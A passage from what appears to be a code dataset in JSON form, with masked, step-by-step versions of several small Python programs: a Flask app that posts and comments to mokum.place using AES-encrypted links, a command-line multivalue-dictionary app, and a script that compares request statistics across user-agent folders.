json.dumps(postdata).encode('utf-8')\n )\n message = json.loads(resp.read().decode('utf-8'))\n if message['post']['id']:\n return message['post']['id']\n except:\n return False\n\n\ndef mokum_comment(messageid, comment):\n try:\n posturl = 'https://mokum.place/api/v1/posts/' + str(messageid\n ) + '/comments.json'\n postdata = {'comment': {'text': comment}, '_uuid': str(uuid.uuid4())}\n req = urllib.request.Request(posturl)\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n resp = urllib.request.urlopen(req, json.dumps(postdata).encode('utf-8')\n )\n message = json.loads(resp.read().decode('utf-8'))\n if message['id']:\n return message['id']\n except:\n return False\n\n\[email protected]('/')\ndef main():\n return render_template('post.html')\n\n\[email protected]('/post', methods=['POST'])\ndef post():\n posttext = request.form['post']\n id = mokum_message(posttext)\n mokum_comment(id, 'click to comment --> ' + appurl + '/c/' + encrypt(\n str(id), secretkey))\n return redirect(mainurl + str(id))\n\n\[email protected]('/c/<cid>')\ndef comm(cid):\n return render_template('comment.html', cid=cid)\n\n\[email protected]('/comment', methods=['POST'])\ndef commented():\n postid = decrypt(request.form['cid'], secretkey)\n posttext = request.form['comment']\n mokum_comment(postid, posttext)\n return redirect(mainurl + postid)\n\n\n<mask token>\n", "step-3": "<mask token>\nBootstrap(app)\nwith open('app_config.yml', 'r') as ymlfile:\n cfg = yaml.load(ymlfile)\n<mask token>\n\n\ndef trans(key):\n return hashlib.md5(key.encode('utf-8')).digest()\n\n\ndef encrypt(message, passphrase):\n passphrase = trans(passphrase)\n IV = Random.new().read(BLOCK_SIZE)\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return base64.b32encode(IV + aes.encrypt(message)).decode('utf-8')\n\n\ndef decrypt(encrypted, passphrase):\n passphrase = trans(passphrase)\n encrypted = base64.b32decode(encrypted)\n IV = encrypted[:BLOCK_SIZE]\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return aes.decrypt(encrypted[BLOCK_SIZE:]).decode('utf-8')\n\n\ndef mokum_message(message):\n try:\n postdata = {'post': {'timelines': ['user'], 'text': message,\n 'comments_disabled': True, 'nsfw': False}, '_uuid': str(uuid.\n uuid4())}\n req = urllib.request.Request('https://mokum.place/api/v1/posts.json')\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n resp = urllib.request.urlopen(req, json.dumps(postdata).encode('utf-8')\n )\n message = json.loads(resp.read().decode('utf-8'))\n if message['post']['id']:\n return message['post']['id']\n except:\n return False\n\n\ndef mokum_comment(messageid, comment):\n try:\n posturl = 'https://mokum.place/api/v1/posts/' + str(messageid\n ) + '/comments.json'\n postdata = {'comment': {'text': comment}, '_uuid': str(uuid.uuid4())}\n req = urllib.request.Request(posturl)\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n resp = urllib.request.urlopen(req, json.dumps(postdata).encode('utf-8')\n )\n message = json.loads(resp.read().decode('utf-8'))\n if message['id']:\n return message['id']\n except:\n return False\n\n\[email protected]('/')\ndef main():\n return render_template('post.html')\n\n\[email protected]('/post', methods=['POST'])\ndef post():\n posttext = request.form['post']\n id = mokum_message(posttext)\n mokum_comment(id, 'click to comment --> ' + appurl + '/c/' + encrypt(\n str(id), secretkey))\n return redirect(mainurl + str(id))\n\n\[email protected]('/c/<cid>')\ndef comm(cid):\n return render_template('comment.html', cid=cid)\n\n\[email protected]('/comment', methods=['POST'])\ndef commented():\n postid = decrypt(request.form['cid'], secretkey)\n posttext = request.form['comment']\n mokum_comment(postid, posttext)\n return redirect(mainurl + postid)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-4": "from flask import Flask\nfrom flask import request, redirect, render_template\nfrom flask_bootstrap import Bootstrap\nimport urllib.request\nimport urllib.parse\nimport json\nimport uuid\nimport yaml\nimport hashlib\nfrom Crypto import Random\nfrom Crypto.Cipher import AES\nimport base64\napp = Flask(__name__)\nBootstrap(app)\nwith open('app_config.yml', 'r') as ymlfile:\n cfg = yaml.load(ymlfile)\npostapikey = cfg['app']['postapikey']\nmainurl = cfg['app']['mainurl']\nappurl = cfg['app']['appurl']\nsecretkey = cfg['app']['secret']\nBLOCK_SIZE = 16\n\n\ndef trans(key):\n return hashlib.md5(key.encode('utf-8')).digest()\n\n\ndef encrypt(message, passphrase):\n passphrase = trans(passphrase)\n IV = Random.new().read(BLOCK_SIZE)\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return base64.b32encode(IV + aes.encrypt(message)).decode('utf-8')\n\n\ndef decrypt(encrypted, passphrase):\n passphrase = trans(passphrase)\n encrypted = base64.b32decode(encrypted)\n IV = encrypted[:BLOCK_SIZE]\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return aes.decrypt(encrypted[BLOCK_SIZE:]).decode('utf-8')\n\n\ndef mokum_message(message):\n try:\n postdata = {'post': {'timelines': ['user'], 'text': message,\n 'comments_disabled': True, 'nsfw': False}, '_uuid': str(uuid.\n uuid4())}\n req = urllib.request.Request('https://mokum.place/api/v1/posts.json')\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n resp = urllib.request.urlopen(req, json.dumps(postdata).encode('utf-8')\n )\n message = json.loads(resp.read().decode('utf-8'))\n if message['post']['id']:\n return message['post']['id']\n except:\n return False\n\n\ndef mokum_comment(messageid, comment):\n try:\n posturl = 'https://mokum.place/api/v1/posts/' + str(messageid\n ) + '/comments.json'\n postdata = {'comment': {'text': comment}, '_uuid': str(uuid.uuid4())}\n req = urllib.request.Request(posturl)\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n resp = urllib.request.urlopen(req, json.dumps(postdata).encode('utf-8')\n )\n message = json.loads(resp.read().decode('utf-8'))\n if message['id']:\n return message['id']\n except:\n return False\n\n\[email protected]('/')\ndef main():\n return render_template('post.html')\n\n\[email protected]('/post', methods=['POST'])\ndef post():\n posttext = request.form['post']\n id = mokum_message(posttext)\n mokum_comment(id, 'click to comment --> ' + appurl + '/c/' + encrypt(\n str(id), secretkey))\n return redirect(mainurl + str(id))\n\n\[email protected]('/c/<cid>')\ndef comm(cid):\n return render_template('comment.html', cid=cid)\n\n\[email protected]('/comment', methods=['POST'])\ndef commented():\n postid = decrypt(request.form['cid'], secretkey)\n posttext = request.form['comment']\n mokum_comment(postid, posttext)\n return redirect(mainurl + postid)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-5": "from flask import Flask\nfrom flask import request, redirect, render_template\nfrom flask_bootstrap import Bootstrap\nimport urllib.request\nimport urllib.parse\nimport json\nimport uuid\nimport yaml\nimport hashlib\nfrom Crypto import Random\nfrom Crypto.Cipher import AES\nimport base64\n\n\n\n\napp = Flask(__name__)\nBootstrap(app)\n\nwith open(\"app_config.yml\", 'r') as ymlfile:\n cfg = yaml.load(ymlfile)\n\npostapikey = cfg['app']['postapikey']\nmainurl = cfg['app']['mainurl']\nappurl = cfg['app']['appurl']\nsecretkey = cfg['app']['secret']\n\n# Some crypto staff\n\nBLOCK_SIZE = 16\n\n\n\ndef trans(key):\n return hashlib.md5(key.encode(\"utf-8\")).digest()\n\n\ndef encrypt(message, passphrase):\n passphrase = trans(passphrase)\n IV = Random.new().read(BLOCK_SIZE)\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return base64.b32encode(IV + aes.encrypt(message)).decode(\"utf-8\")\n\n\ndef decrypt(encrypted, passphrase):\n passphrase = trans(passphrase)\n encrypted = base64.b32decode(encrypted)\n IV = encrypted[:BLOCK_SIZE]\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return aes.decrypt(encrypted[BLOCK_SIZE:]).decode(\"utf-8\")\n\n\ndef mokum_message(message):\n try:\n postdata = {\"post\": {\"timelines\": [\"user\"],\n \"text\": message,\n \"comments_disabled\": True,\n \"nsfw\": False},\n \"_uuid\": str(uuid.uuid4())\n }\n\n req = urllib.request.Request(\"https://mokum.place/api/v1/posts.json\")\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n\n resp = urllib.request.urlopen(req, json.dumps(postdata).encode(\"utf-8\"))\n\n message = json.loads(resp.read().decode(\"utf-8\"))\n\n if message['post']['id']:\n return message['post']['id']\n except:\n return False\n\n\ndef mokum_comment(messageid, comment):\n try:\n posturl = \"https://mokum.place/api/v1/posts/\" + str(messageid) + \"/comments.json\"\n postdata = {\"comment\": {\"text\": comment,\n # \"platform\": \"anonymous device\"\n },\n \"_uuid\": str(uuid.uuid4())}\n\n req = urllib.request.Request(posturl)\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n\n resp = urllib.request.urlopen(req, json.dumps(postdata).encode(\"utf-8\"))\n\n message = json.loads(resp.read().decode(\"utf-8\"))\n\n if message['id']:\n return message['id']\n\n except:\n return False\n\n\[email protected]('/')\ndef main():\n return render_template('post.html')\n\n\[email protected]('/post', methods=['POST'])\ndef post():\n posttext = request.form['post']\n id = mokum_message(posttext)\n mokum_comment(id, \"click to comment --> \" + appurl + \"/c/\" + encrypt(str(id), secretkey))\n return redirect(mainurl + str(id))\n\n\[email protected]('/c/<cid>')\ndef comm(cid):\n return render_template('comment.html', cid=cid)\n\n\[email protected]('/comment', methods=['POST'])\ndef commented():\n postid = decrypt(request.form['cid'], secretkey)\n posttext = request.form['comment']\n mokum_comment(postid, posttext)\n return redirect(mainurl + postid)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-ids": [ 7, 9, 10, 12, 13 ] }
[ 7, 9, 10, 12, 13 ]
from src.MultiValueDictApp import MultiValueDictApp def main(): app = MultiValueDictApp() print("Welcome to Multivalue Dictionary App") print("COMMANDS and format:") print("KEYS") print("MEMBERS key") print("ADD key value") print("REMOVE key value") print("REMOVEALL key") print("CLEAR") print("KEYEXISTS key") print("VALUEEXISTS key value") print("ALLMEMBERS") print("ITEMS") print("EXIT") print("Enter COMMAND key value below") print("---------------------------------------") print("") while True: command, *args = input().split(' ') app.run(command, args) if __name__ == "__main__": main()
normal
{ "blob_id": "21e83369c4100c41885e9ee8a8d7310556bfe51d", "index": 7271, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef main():\n app = MultiValueDictApp()\n print('Welcome to Multivalue Dictionary App')\n print('COMMANDS and format:')\n print('KEYS')\n print('MEMBERS key')\n print('ADD key value')\n print('REMOVE key value')\n print('REMOVEALL key')\n print('CLEAR')\n print('KEYEXISTS key')\n print('VALUEEXISTS key value')\n print('ALLMEMBERS')\n print('ITEMS')\n print('EXIT')\n print('Enter COMMAND key value below')\n print('---------------------------------------')\n print('')\n while True:\n command, *args = input().split(' ')\n app.run(command, args)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef main():\n app = MultiValueDictApp()\n print('Welcome to Multivalue Dictionary App')\n print('COMMANDS and format:')\n print('KEYS')\n print('MEMBERS key')\n print('ADD key value')\n print('REMOVE key value')\n print('REMOVEALL key')\n print('CLEAR')\n print('KEYEXISTS key')\n print('VALUEEXISTS key value')\n print('ALLMEMBERS')\n print('ITEMS')\n print('EXIT')\n print('Enter COMMAND key value below')\n print('---------------------------------------')\n print('')\n while True:\n command, *args = input().split(' ')\n app.run(command, args)\n\n\nif __name__ == '__main__':\n main()\n", "step-4": "from src.MultiValueDictApp import MultiValueDictApp\n\n\ndef main():\n app = MultiValueDictApp()\n print('Welcome to Multivalue Dictionary App')\n print('COMMANDS and format:')\n print('KEYS')\n print('MEMBERS key')\n print('ADD key value')\n print('REMOVE key value')\n print('REMOVEALL key')\n print('CLEAR')\n print('KEYEXISTS key')\n print('VALUEEXISTS key value')\n print('ALLMEMBERS')\n print('ITEMS')\n print('EXIT')\n print('Enter COMMAND key value below')\n print('---------------------------------------')\n print('')\n while True:\n command, *args = input().split(' ')\n app.run(command, args)\n\n\nif __name__ == '__main__':\n main()\n", "step-5": "from src.MultiValueDictApp import MultiValueDictApp\n\ndef main():\n app = MultiValueDictApp()\n print(\"Welcome to Multivalue Dictionary App\")\n print(\"COMMANDS and format:\")\n print(\"KEYS\")\n print(\"MEMBERS key\")\n print(\"ADD key value\")\n print(\"REMOVE key value\")\n print(\"REMOVEALL key\")\n print(\"CLEAR\")\n print(\"KEYEXISTS key\")\n print(\"VALUEEXISTS key value\")\n print(\"ALLMEMBERS\")\n print(\"ITEMS\")\n print(\"EXIT\")\n print(\"Enter COMMAND key value below\")\n print(\"---------------------------------------\")\n print(\"\")\n\n while True:\n command, *args = input().split(' ')\n app.run(command, args)\n\nif __name__ == \"__main__\":\n main()", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from __future__ import absolute_import from . import utils from . import bert_model from . import transformer from .utils import * from .bert_model import * from .transformer import *
normal
{ "blob_id": "6415b08795975698e8e2019cafb82561b35f8e71", "index": 2037, "step-1": "<mask token>\n", "step-2": "from __future__ import absolute_import\nfrom . import utils\nfrom . import bert_model\nfrom . import transformer\nfrom .utils import *\nfrom .bert_model import *\nfrom .transformer import *\n", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
S = input() T = int(input()) B = abs(S.count('L') - S.count('R')) + abs(S.count('U') - S.count('D')) print(B + S.count('?') if T == 1 else max(B - S.count('?'), (B - S.count( '?')) % 2))
normal
{ "blob_id": "ce263424b856c07e04bd66cda7ebda646583b1fe", "index": 5962, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(B + S.count('?') if T == 1 else max(B - S.count('?'), (B - S.count(\n '?')) % 2))\n", "step-3": "S = input()\nT = int(input())\nB = abs(S.count('L') - S.count('R')) + abs(S.count('U') - S.count('D'))\nprint(B + S.count('?') if T == 1 else max(B - S.count('?'), (B - S.count(\n '?')) % 2))\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
import os import factorStatFileCreator dirName = 'NoPerms/' dirName2 = 'AllPerms/' freqAgentDic = dict() lenAgentDic = dict() contAgentDic = dict() def freqModAvgFunc(dirName): fullList = factorStatFileCreator.directoryFreq(dirName) UA = dirName.split("/")[1] avgList = [] sum = 0 i = 0 while i <= len(fullList) - 2: diff = factorStatFileCreator.diffFunc(fullList[i], fullList[i+1]) if diff == None: i+=1 else: avgList.append(int(diff)) i+=1 for item in avgList: sum += item if len(avgList) != 0: if UA not in freqAgentDic.keys(): freqAgentDic[UA] = [sum/len(avgList)] else: agentList = freqAgentDic[UA] agentList.append(sum/len(avgList)) freqAgentDic[UA] = agentList def finalFreqFunc(dirName): for filename in os.listdir(dirName): file = dirName + filename freqModAvgFunc(file) def printFreqDiff(): finalFreqFunc(dirName) finalFreqFunc(dirName2) #print (freqAgentDic) for keys, vals in freqAgentDic.items(): if len(vals) > 1 and vals[1] > 0: score = vals[0] / vals[1] print ("{:<15}: {:.2f}".format(keys,score)) else: score = "N/A" print ("{:<15}: {}".format(keys,score)) freqAgentDic[keys] = score return (freqAgentDic) def avgModFunc(directory): sum = 0 UA = directory.split("/")[1] byteList = factorStatFileCreator.directoryLen(directory) for item in byteList: sum += item if len(byteList) != 0: if UA not in lenAgentDic.keys(): lenAgentDic[UA] = [sum/len(byteList)] else: agentList = lenAgentDic[UA] agentList.append(sum/len(byteList)) lenAgentDic[UA] = agentList def finalLenFunc(dirName): for filename in os.listdir(dirName): file = dirName + filename avgModFunc(file) def printLenDiff(): finalLenFunc(dirName) finalLenFunc(dirName2) for keys, vals in lenAgentDic.items(): if len(vals) > 1 and vals[1] > 0: score = vals[1] / vals[0] print ("{:<15}: {:.2f}".format(keys,score)) else: score = "N/A" print ("{:<15}: {}".format(keys,score)) lenAgentDic[keys] = score return lenAgentDic def directoryModCont(directory): contentSet = set() newSet = set() listHolder = [] numofReq = 0 UA = directory.split("/")[1] for filename in os.listdir(directory): file = directory + '/' + filename listHolder = factorStatFileCreator.contentCommand(file) #print(newSet) newSet = listHolder[0] numofReq += len(listHolder[1]) contentSet = contentSet|newSet newSet = set() if UA not in contAgentDic.keys(): contAgentDic[UA] = [numofReq] else: agentList = contAgentDic[UA] agentList.append(numofReq) contAgentDic[UA] = agentList return contentSet, numofReq def finalContFunc(dirName): for filename in os.listdir(dirName): file = dirName + filename directoryModCont(file) def printContDiff(): finalContFunc(dirName) finalContFunc(dirName2) for keys, vals in contAgentDic.items(): if len(vals) > 1 and vals[1] > 0: score = vals[0] / vals[1] print ("{:<15}: {:.2f}".format(keys,score)) else: score = "N/A" print ("{:<15}: {}".format(keys,score)) contAgentDic[keys] = score return contAgentDic
normal
{ "blob_id": "8ac84aa29e9e4f3b85f1b3c27819feb5f41e8d8e", "index": 598, "step-1": "<mask token>\n\n\ndef freqModAvgFunc(dirName):\n fullList = factorStatFileCreator.directoryFreq(dirName)\n UA = dirName.split('/')[1]\n avgList = []\n sum = 0\n i = 0\n while i <= len(fullList) - 2:\n diff = factorStatFileCreator.diffFunc(fullList[i], fullList[i + 1])\n if diff == None:\n i += 1\n else:\n avgList.append(int(diff))\n i += 1\n for item in avgList:\n sum += item\n if len(avgList) != 0:\n if UA not in freqAgentDic.keys():\n freqAgentDic[UA] = [sum / len(avgList)]\n else:\n agentList = freqAgentDic[UA]\n agentList.append(sum / len(avgList))\n freqAgentDic[UA] = agentList\n\n\n<mask token>\n\n\ndef printFreqDiff():\n finalFreqFunc(dirName)\n finalFreqFunc(dirName2)\n for keys, vals in freqAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n freqAgentDic[keys] = score\n return freqAgentDic\n\n\n<mask token>\n\n\ndef finalLenFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n avgModFunc(file)\n\n\ndef printLenDiff():\n finalLenFunc(dirName)\n finalLenFunc(dirName2)\n for keys, vals in lenAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[1] / vals[0]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n lenAgentDic[keys] = score\n return lenAgentDic\n\n\ndef directoryModCont(directory):\n contentSet = set()\n newSet = set()\n listHolder = []\n numofReq = 0\n UA = directory.split('/')[1]\n for filename in os.listdir(directory):\n file = directory + '/' + filename\n listHolder = factorStatFileCreator.contentCommand(file)\n newSet = listHolder[0]\n numofReq += len(listHolder[1])\n contentSet = contentSet | newSet\n newSet = set()\n if UA not in contAgentDic.keys():\n contAgentDic[UA] = [numofReq]\n else:\n agentList = contAgentDic[UA]\n agentList.append(numofReq)\n contAgentDic[UA] = agentList\n return contentSet, numofReq\n\n\ndef finalContFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n directoryModCont(file)\n\n\ndef printContDiff():\n finalContFunc(dirName)\n finalContFunc(dirName2)\n for keys, vals in contAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n contAgentDic[keys] = score\n return contAgentDic\n", "step-2": "<mask token>\n\n\ndef freqModAvgFunc(dirName):\n fullList = factorStatFileCreator.directoryFreq(dirName)\n UA = dirName.split('/')[1]\n avgList = []\n sum = 0\n i = 0\n while i <= len(fullList) - 2:\n diff = factorStatFileCreator.diffFunc(fullList[i], fullList[i + 1])\n if diff == None:\n i += 1\n else:\n avgList.append(int(diff))\n i += 1\n for item in avgList:\n sum += item\n if len(avgList) != 0:\n if UA not in freqAgentDic.keys():\n freqAgentDic[UA] = [sum / len(avgList)]\n else:\n agentList = freqAgentDic[UA]\n agentList.append(sum / len(avgList))\n freqAgentDic[UA] = agentList\n\n\ndef finalFreqFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n freqModAvgFunc(file)\n\n\ndef printFreqDiff():\n finalFreqFunc(dirName)\n finalFreqFunc(dirName2)\n for keys, vals in freqAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n freqAgentDic[keys] = score\n return freqAgentDic\n\n\n<mask token>\n\n\ndef finalLenFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n avgModFunc(file)\n\n\ndef printLenDiff():\n finalLenFunc(dirName)\n finalLenFunc(dirName2)\n for keys, vals in lenAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[1] / vals[0]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n lenAgentDic[keys] = score\n return lenAgentDic\n\n\ndef directoryModCont(directory):\n contentSet = set()\n newSet = set()\n listHolder = []\n numofReq = 0\n UA = directory.split('/')[1]\n for filename in os.listdir(directory):\n file = directory + '/' + filename\n listHolder = factorStatFileCreator.contentCommand(file)\n newSet = listHolder[0]\n numofReq += len(listHolder[1])\n contentSet = contentSet | newSet\n newSet = set()\n if UA not in contAgentDic.keys():\n contAgentDic[UA] = [numofReq]\n else:\n agentList = contAgentDic[UA]\n agentList.append(numofReq)\n contAgentDic[UA] = agentList\n return contentSet, numofReq\n\n\ndef finalContFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n directoryModCont(file)\n\n\ndef printContDiff():\n finalContFunc(dirName)\n finalContFunc(dirName2)\n for keys, vals in contAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n contAgentDic[keys] = score\n return contAgentDic\n", "step-3": "<mask token>\n\n\ndef freqModAvgFunc(dirName):\n fullList = factorStatFileCreator.directoryFreq(dirName)\n UA = dirName.split('/')[1]\n avgList = []\n sum = 0\n i = 0\n while i <= len(fullList) - 2:\n diff = factorStatFileCreator.diffFunc(fullList[i], fullList[i + 1])\n if diff == None:\n i += 1\n else:\n avgList.append(int(diff))\n i += 1\n for item in avgList:\n sum += item\n if len(avgList) != 0:\n if UA not in freqAgentDic.keys():\n freqAgentDic[UA] = [sum / len(avgList)]\n else:\n agentList = freqAgentDic[UA]\n agentList.append(sum / len(avgList))\n freqAgentDic[UA] = agentList\n\n\ndef finalFreqFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n freqModAvgFunc(file)\n\n\ndef printFreqDiff():\n finalFreqFunc(dirName)\n finalFreqFunc(dirName2)\n for keys, vals in freqAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n freqAgentDic[keys] = score\n return freqAgentDic\n\n\ndef avgModFunc(directory):\n sum = 0\n UA = directory.split('/')[1]\n byteList = factorStatFileCreator.directoryLen(directory)\n for item in byteList:\n sum += item\n if len(byteList) != 0:\n if UA not in lenAgentDic.keys():\n lenAgentDic[UA] = [sum / len(byteList)]\n else:\n agentList = lenAgentDic[UA]\n agentList.append(sum / len(byteList))\n lenAgentDic[UA] = agentList\n\n\ndef finalLenFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n avgModFunc(file)\n\n\ndef printLenDiff():\n finalLenFunc(dirName)\n finalLenFunc(dirName2)\n for keys, vals in lenAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[1] / vals[0]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n lenAgentDic[keys] = score\n return lenAgentDic\n\n\ndef directoryModCont(directory):\n contentSet = set()\n newSet = set()\n listHolder = []\n numofReq = 0\n UA = directory.split('/')[1]\n for filename in os.listdir(directory):\n file = directory + '/' + filename\n listHolder = factorStatFileCreator.contentCommand(file)\n newSet = listHolder[0]\n numofReq += len(listHolder[1])\n contentSet = contentSet | newSet\n newSet = set()\n if UA not in contAgentDic.keys():\n contAgentDic[UA] = [numofReq]\n else:\n agentList = contAgentDic[UA]\n agentList.append(numofReq)\n contAgentDic[UA] = agentList\n return contentSet, numofReq\n\n\ndef finalContFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n directoryModCont(file)\n\n\ndef printContDiff():\n finalContFunc(dirName)\n finalContFunc(dirName2)\n for keys, vals in contAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n contAgentDic[keys] = score\n return contAgentDic\n", "step-4": "<mask token>\ndirName = 'NoPerms/'\ndirName2 = 'AllPerms/'\nfreqAgentDic = dict()\nlenAgentDic = dict()\ncontAgentDic = dict()\n\n\ndef freqModAvgFunc(dirName):\n fullList = factorStatFileCreator.directoryFreq(dirName)\n UA = dirName.split('/')[1]\n avgList = []\n sum = 0\n i = 0\n while i <= len(fullList) - 2:\n diff = factorStatFileCreator.diffFunc(fullList[i], fullList[i + 1])\n if diff == None:\n i += 1\n else:\n avgList.append(int(diff))\n i += 1\n for item in avgList:\n sum += item\n if len(avgList) != 0:\n if UA not in freqAgentDic.keys():\n freqAgentDic[UA] = [sum / len(avgList)]\n else:\n agentList = freqAgentDic[UA]\n agentList.append(sum / len(avgList))\n freqAgentDic[UA] = agentList\n\n\ndef finalFreqFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n freqModAvgFunc(file)\n\n\ndef printFreqDiff():\n finalFreqFunc(dirName)\n finalFreqFunc(dirName2)\n for keys, vals in freqAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n freqAgentDic[keys] = score\n return freqAgentDic\n\n\ndef avgModFunc(directory):\n sum = 0\n UA = directory.split('/')[1]\n byteList = factorStatFileCreator.directoryLen(directory)\n for item in byteList:\n sum += item\n if len(byteList) != 0:\n if UA not in lenAgentDic.keys():\n lenAgentDic[UA] = [sum / len(byteList)]\n else:\n agentList = lenAgentDic[UA]\n agentList.append(sum / len(byteList))\n lenAgentDic[UA] = agentList\n\n\ndef finalLenFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n avgModFunc(file)\n\n\ndef printLenDiff():\n finalLenFunc(dirName)\n finalLenFunc(dirName2)\n for keys, vals in lenAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[1] / vals[0]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n lenAgentDic[keys] = score\n return lenAgentDic\n\n\ndef directoryModCont(directory):\n contentSet = set()\n newSet = set()\n listHolder = []\n numofReq = 0\n UA = directory.split('/')[1]\n for filename in os.listdir(directory):\n file = directory + '/' + filename\n listHolder = factorStatFileCreator.contentCommand(file)\n newSet = listHolder[0]\n numofReq += len(listHolder[1])\n contentSet = contentSet | newSet\n newSet = set()\n if UA not in contAgentDic.keys():\n contAgentDic[UA] = [numofReq]\n else:\n agentList = contAgentDic[UA]\n agentList.append(numofReq)\n contAgentDic[UA] = agentList\n return contentSet, numofReq\n\n\ndef finalContFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n directoryModCont(file)\n\n\ndef printContDiff():\n finalContFunc(dirName)\n finalContFunc(dirName2)\n for keys, vals in contAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n contAgentDic[keys] = score\n return contAgentDic\n", "step-5": "import os\nimport factorStatFileCreator\n\ndirName = 'NoPerms/'\ndirName2 = 'AllPerms/'\n\nfreqAgentDic = dict()\nlenAgentDic = dict()\ncontAgentDic = dict()\n\ndef freqModAvgFunc(dirName):\n fullList = factorStatFileCreator.directoryFreq(dirName)\n UA = dirName.split(\"/\")[1]\n avgList = []\n sum = 0\n i = 0\n while i <= len(fullList) - 2:\n diff = factorStatFileCreator.diffFunc(fullList[i], fullList[i+1])\n if diff == None:\n i+=1\n else:\n avgList.append(int(diff))\n i+=1\n for item in avgList:\n sum += item\n if len(avgList) != 0:\n if UA not in freqAgentDic.keys():\n freqAgentDic[UA] = [sum/len(avgList)]\n else:\n agentList = freqAgentDic[UA]\n agentList.append(sum/len(avgList))\n freqAgentDic[UA] = agentList\n\ndef finalFreqFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n freqModAvgFunc(file)\n\ndef printFreqDiff():\n finalFreqFunc(dirName)\n finalFreqFunc(dirName2)\n #print (freqAgentDic)\n for keys, vals in freqAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print (\"{:<15}: {:.2f}\".format(keys,score))\n else:\n score = \"N/A\"\n print (\"{:<15}: {}\".format(keys,score))\n freqAgentDic[keys] = score\n return (freqAgentDic)\n\ndef avgModFunc(directory):\n sum = 0\n UA = directory.split(\"/\")[1]\n byteList = factorStatFileCreator.directoryLen(directory)\n for item in byteList:\n sum += item\n if len(byteList) != 0:\n if UA not in lenAgentDic.keys():\n lenAgentDic[UA] = [sum/len(byteList)]\n else:\n agentList = lenAgentDic[UA]\n 